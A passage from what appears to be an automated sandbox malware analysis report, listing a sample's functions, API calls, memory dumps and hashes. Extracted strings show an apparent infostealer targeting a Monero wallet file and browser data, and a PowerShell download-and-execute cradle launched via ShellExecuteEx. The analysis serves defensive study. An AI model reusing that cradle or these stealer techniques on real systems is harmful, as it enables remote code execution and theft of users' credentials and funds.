                              • RegQueryValueExA.ADVAPI32(00000000,007FE128,00000000,000F003F,?,00000400), ref: 00C684EC
                              • lstrlen.KERNEL32(?), ref: 00C68501
                              • RegQueryValueExA.ADVAPI32(00000000,007FDF48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C70B34), ref: 00C68599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C68608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C6861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 465ace58a023656bb04559807e3d0abe39c703f804c2b1e479ea0ddb1c771093
                              • Instruction ID: 415d7b8ad540e562e0e1590dd8f6a94e06c471a92746e0ac9c751ad1bf5ef431
                              • Opcode Fuzzy Hash: 465ace58a023656bb04559807e3d0abe39c703f804c2b1e479ea0ddb1c771093
                              • Instruction Fuzzy Hash: EC21EA719102189FDB24DB54DC85FE9B3B8FF48700F04C5AAA609A6140DF71AA85CFD4
                              Function 00C67690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C676A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C676AB
                              • RegOpenKeyExA.ADVAPI32(80000002,007EC0B8,00000000,00020119,00000000), ref: 00C676DD
                              • RegQueryValueExA.ADVAPI32(00000000,007FDF78,00000000,00000000,?,000000FF), ref: 00C676FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C67708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: e0b3a8fcde489caa741a4a9ca2f16c4d8cbde719fbf986faefff1ce0408a9998
                              • Instruction ID: 5f9e716f4fdbcde307dc3350fa2c20a36b5908afbede01de25915a897bdbef44
                              • Opcode Fuzzy Hash: e0b3a8fcde489caa741a4a9ca2f16c4d8cbde719fbf986faefff1ce0408a9998
                              • Instruction Fuzzy Hash: 1D0144B5A04204BFDB10DBE5DD4DF6D77B8EF44705F144567FA04E7190D67099048B91
                              Function 00C67720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C6773B
                              • RegOpenKeyExA.ADVAPI32(80000002,007EC0B8,00000000,00020119,00C676B9), ref: 00C6775B
                              • RegQueryValueExA.ADVAPI32(00C676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C6777A
                              • RegCloseKey.ADVAPI32(00C676B9), ref: 00C67784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: fd8637a28e86adde849a9b5b99d8138deafb9d48fafa8a20d473b536e6d96be2
                              • Instruction ID: e5e924893077d5d67ee36411ebf2f6c69999174b73cc2cf1dc9866839babf9d1
                              • Opcode Fuzzy Hash: fd8637a28e86adde849a9b5b99d8138deafb9d48fafa8a20d473b536e6d96be2
                              • Instruction Fuzzy Hash: F8014FB5A40308BFDB10DBE1DC4AFAEB7B8EF48700F10456AFA05A7281DA705A048B91
                              Function 00C599C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                              • LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 198273fbe840b9cd41eeac0cfe48c0f5edc7a1418251e6b3e17869443c9ba194
                              • Instruction ID: f2892330a5641a94200e8222e0e0fa54347c264aaf1e8592b96a030e903ceb07
                              • Opcode Fuzzy Hash: 198273fbe840b9cd41eeac0cfe48c0f5edc7a1418251e6b3e17869443c9ba194
                              • Instruction Fuzzy Hash: 95316BB8A00209EFDB14CF95C885BAEB7F5FF48301F108199E811A7290C774AA85DFA5
                              Function 00C64780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,007FE410), ref: 00C647DB
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64801
                              • lstrcat.KERNEL32(?,?), ref: 00C64820
                              • lstrcat.KERNEL32(?,?), ref: 00C64834
                              • lstrcat.KERNEL32(?,007EB748), ref: 00C64847
                              • lstrcat.KERNEL32(?,?), ref: 00C6485B
                              • lstrcat.KERNEL32(?,007FDC80), ref: 00C6486F
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C68D90: GetFileAttributesA.KERNEL32(00000000,?,00C51B54,?,?,00C7564C,?,?,00C70E1F), ref: 00C68D9F
                                • Part of subcall function 00C64570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C64580
                                • Part of subcall function 00C64570: RtlAllocateHeap.NTDLL(00000000), ref: 00C64587
                                • Part of subcall function 00C64570: wsprintfA.USER32 ref: 00C645A6
                                • Part of subcall function 00C64570: FindFirstFileA.KERNEL32(?,?), ref: 00C645BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 9550efe9071971d247041885f0aa2284289e2e22e4ed8c09d04af6644959d9da
                              • Instruction ID: 63c8dbcf1d141e57968e2a42fabca57c0e772af462ebd8b92d91d26e7a97db95
                              • Opcode Fuzzy Hash: 9550efe9071971d247041885f0aa2284289e2e22e4ed8c09d04af6644959d9da
                              • Instruction Fuzzy Hash: 143162B29002085BCB24FBB0DCCAEE97378AB58700F44459AB715A6081EE74978DDF95
                              Function 00C62C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C62D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C62D04
                              • ')", xrefs: 00C62CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C62CC4
                              • <, xrefs: 00C62D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 00472ecf996d4e48a97310d990cec80eb97162194183a5a499a7387a6a973304
                              • Instruction ID: ed33c5931b33aab031033360fe74806f6397c76a4e744fd989bba9c852bc88d3
                              • Opcode Fuzzy Hash: 00472ecf996d4e48a97310d990cec80eb97162194183a5a499a7387a6a973304
                              • Instruction Fuzzy Hash: B3419D71D102089ADB28FFA1C8D6BEDBB74AF14300F504129E516B71D2DF746A4ADF92
                              Function 00C59E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00C59F41
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 70c11f1fa11dec9bde9f3593113f574a97e27d7e79fa79a18f10a1a1c6020f2a
                              • Instruction ID: abdade6ca9cb3e626779611878347a4f38495dbe12a73849c074b4aed84bc747
                              • Opcode Fuzzy Hash: 70c11f1fa11dec9bde9f3593113f574a97e27d7e79fa79a18f10a1a1c6020f2a
                              • Instruction Fuzzy Hash: CE616D74A10208EFDB24EFA5CC96FED7775AF44300F008118FD0A6B192EB706A49DB96
                              Function 00C640B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,007FDBC0,00000000,00020119,?), ref: 00C640F4
                              • RegQueryValueExA.ADVAPI32(?,007FE1D0,00000000,00000000,00000000,000000FF), ref: 00C64118
                              • RegCloseKey.ADVAPI32(?), ref: 00C64122
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64147
                              • lstrcat.KERNEL32(?,007FE248), ref: 00C6415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 61a4b5c653d9d6d411b06a8695ce7c15a3dfc63a0e4947a45da3f04e58199a05
                              • Instruction ID: 5ddaf4ff1b5f06baa7381f7d1df571e2408e915185521cd7e9fd3691dde39e96
                              • Opcode Fuzzy Hash: 61a4b5c653d9d6d411b06a8695ce7c15a3dfc63a0e4947a45da3f04e58199a05
                              • Instruction Fuzzy Hash: 78418CB6D001086BDB24EBA0DC8AFFD737DAB48300F44455ABA1557181EA755B8C9BE2
                              Function 00C66920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00C6696C
                              • sscanf.NTDLL ref: 00C66999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C669B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C669C0
                              • ExitProcess.KERNEL32 ref: 00C669DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 641847d3fd865508737fff89660379738273d3e242713b4ab05f1b779aa02f39
                              • Instruction ID: 0bf66db934b839780dddbf1393f0b289296ce9ef6becb121c65aaac58dcd537a
                              • Opcode Fuzzy Hash: 641847d3fd865508737fff89660379738273d3e242713b4ab05f1b779aa02f39
                              • Instruction Fuzzy Hash: C121CD75D14208AFCF18EFE5D9459EEB7B5BF48300F04452AE416F3250EB345609CBA5
                              Function 00C67E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,007EBF30,00000000,00020119,?), ref: 00C67E5E
                              • RegQueryValueExA.ADVAPI32(?,007FDA20,00000000,00000000,000000FF,000000FF), ref: 00C67E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00C67E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
